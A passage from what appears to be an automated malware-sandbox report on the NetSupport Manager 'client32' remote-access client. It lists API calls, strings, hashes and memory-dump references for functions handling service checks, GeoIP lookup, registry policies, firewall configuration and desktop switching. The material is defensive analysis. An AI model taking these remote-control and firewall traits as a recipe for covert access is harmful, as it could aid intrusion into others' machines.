OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
Sleep.KERNEL32(00000032), ref: 1102D5D6
CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
Sleep.KERNEL32(000003E8), ref: 1102D632
CloseHandle.KERNEL32(?), ref: 1102D65F

Strings

ProtectedStorage, xrefs: 1102D5A4
IKS.LIC, xrefs: 1102D6B6, 1102D6BD, 1102D6ED
>, xrefs: 1102D50B
NSM.LIC, xrefs: 1102D697
NSA.LIC, xrefs: 1102D6A6

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
API String ID: 83693535-1096744297
Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50

Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
GetTickCount.KERNEL32 ref: 1102CBCA

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

GetTickCount.KERNEL32 ref: 1102CCC4

Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
CloseHandle.KERNEL32(?), ref: 1102CDD8

Strings

_debug, xrefs: 1102CC18, 1102CC7A
GetLatLong=%s, took %d ms, xrefs: 1102CCE1
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102CE09, 1102CE1D, 1102CE31, 1102CE45
http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102CBE5
LatLong, xrefs: 1102CB88, 1102CC75
?IP=%s, xrefs: 1102CC56
IsA(), xrefs: 1102CE0E, 1102CE22, 1102CE36, 1102CE4A
GeoIP, xrefs: 1102CC13

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-1725438197
Opcode ID: 82ce7ff8cbb2b5358d8abc1fced85d0fa1010a380384f47bd129b7024de676e6
Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
Opcode Fuzzy Hash: 82ce7ff8cbb2b5358d8abc1fced85d0fa1010a380384f47bd129b7024de676e6
Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1

Function 11062220 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A

Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
RegCloseKey.ADVAPI32(?), ref: 110623A1

Strings

DisableUserPolicies, xrefs: 110623B3
%s\%s\%s\, xrefs: 11062324
Client.%04d.%s, xrefs: 11062307
Software\Policies\NetSupport\Client, xrefs: 11062274
Standard, xrefs: 110622E6
Client, xrefs: 1106231A
Software\Policies\NetSupport\Client\Standard, xrefs: 1106228D
Client, xrefs: 11062288, 110623B8
Software\Policies\NetSupport, xrefs: 1106231F

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1

Function 11138580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

GetTickCount.KERNEL32 ref: 111385E2

Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
Part of subcall function 11096D90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9

GetTickCount.KERNEL32 ref: 111385F1
_memset.LIBCMT ref: 11138633
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
_strrchr.LIBCMT ref: 11138658
_free.LIBCMT ref: 111386AA

Strings

ICFConfig, xrefs: 11138595
ICFConfig2 returned 0x%x, xrefs: 111386B0
No ICF present, xrefs: 111386E2
Client, xrefs: 111385BC
*AutoICFConfig, xrefs: 111385B7
IsICFPresent..., xrefs: 111385CF
IsICFPresent() took %d ms, xrefs: 111385FD

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
API String ID: 711243594-1270230032
Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1

Function 11133B00 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11133B70
GetTickCount.KERNEL32 ref: 11133BA1
SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
GetTickCount.KERNEL32 ref: 11133BBC

Strings

CommonPath, xrefs: 11133BDF
HasStudentComponents=%d, xrefs: 11133C37
Warning. SHGetFolderPath took %d ms, xrefs: 11133BC6
schplayer.exe, xrefs: 11133BF8
%s%s, xrefs: 11133B6A, 11133C0E
runplugin.exe, xrefs: 11133B4E
Software\NSL, xrefs: 11133BE4

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FolderPathwsprintf
String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
API String ID: 1170620360-4157686185
Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795

Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11027286
_strtok.LIBCMT ref: 110272C0
Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4

Strings

Retrying..., xrefs: 110273A2
*max_sessions, xrefs: 11027316
TCPIP, xrefs: 110272E2
LoadTransports(%d), xrefs: 110272FC
Protocols, xrefs: 11027271
Client, xrefs: 11027276, 1102731B
Error. not all transports loaded (%d/%d), xrefs: 11027388
UseNCS, xrefs: 110272DD

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$Sleep
String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
API String ID: 2009458258-3774545468
Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92

Function 111037D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583

GetCurrentThreadId.KERNEL32 ref: 111037EC
GetThreadDesktop.USER32(00000000), ref: 111037F3
OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
SetThreadDesktop.USER32(00000000), ref: 11103810
CloseDesktop.USER32(00000000), ref: 11103829
GetLastError.KERNEL32 ref: 11103831
CloseDesktop.USER32(00000000), ref: 11103847
GetLastError.KERNEL32 ref: 1110384F

Strings

OpenDesktop(%s) failed, e=%d, xrefs: 11103857
SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
SetThreadDesktop(%s) ok, xrefs: 1110381B

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
API String ID: 2036220054-60805735
Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6

Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
GetLastError.KERNEL32 ref: 1115F275
wsprintfA.USER32 ref: 1115F288

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9

Strings

NSMWndClass, xrefs: 1115F260
m_aProp, xrefs: 1115F2BA
NSMReflect, xrefs: 1115F2C7
NSMDropTarget, xrefs: 1115F2CE
GlobalAddAtom failed, e=%d, xrefs: 1115F282
..\ctl32\wndclass.cpp, xrefs: 1115F299, 1115F2B5

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81

Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 11110E4A
__CxxThrowException@8.LIBCMT ref: 11110E5F
GetCurrentThreadId.KERNEL32 ref: 11110E76
InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F

Strings

..\ctl32\Refcount.cpp, xrefs: 11110EE6
QueueThreadEvent, xrefs: 11110EEB

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 1976012330-1024648535
Opcode ID: 3f1f8e0be68962e051d3ca5ce6726616c1cab505bcdc025fa2b627742035626d
Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
Opcode Fuzzy Hash: 3f1f8e0be68962e051d3ca5ce6726616c1cab505bcdc025fa2b627742035626d
Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91

Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,0BAD89F8,00000000,?,00000000), ref: 110613A4
_malloc.LIBCMT ref: 110613EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,0BAD89F8,00000000), ref: 1106142B
RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
_free.LIBCMT ref: 110614A4

Strings

maxname < _tsizeof (m_szSectionAndKey), xrefs: 110613D8
strlen (k.m_k) < _tsizeof (m_szSectionAndKey), xrefs: 110615AA
..\ctl32\Config.cpp, xrefs: 110613B3, 110613D3, 110615A5
err == 0, xrefs: 110613B8

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
